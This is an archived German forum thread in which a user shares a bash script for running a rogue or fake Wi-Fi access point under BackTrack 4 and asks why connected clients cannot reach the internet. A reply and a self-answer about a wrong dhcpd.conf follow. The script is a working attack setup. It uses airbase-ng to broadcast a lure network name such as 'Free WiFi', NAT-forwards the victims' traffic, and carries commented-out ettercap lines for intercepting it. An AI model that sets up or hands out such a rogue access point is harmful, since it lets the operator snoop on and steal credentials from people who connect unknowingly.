PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : rogue/fake access point



Draik
18.06.2009, 17:58
morgen,
ich hoffe irgendjemand hat davon etwas mehr ahnung als ich. ich versuche seit einigen tagen einen access point via backtrack 4
zum laufen zu bekommen. der dhcp server funktioniert mittlerweile, aber die verbunden clients können sich immer noch nicht mit dem internet
verbinden.

ich hab diesen script hier benutzt:


##!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun

konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &

sleep 10
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
#konsole -e ettercap -T -q -p -i at0 // // &
sleep 8

maoshe
28.06.2009, 02:02
ist die inet-verbindung freigegeben?

Draik
08.07.2009, 10:12
habs hinbekommen, lag an ner falschen dhcpd.conf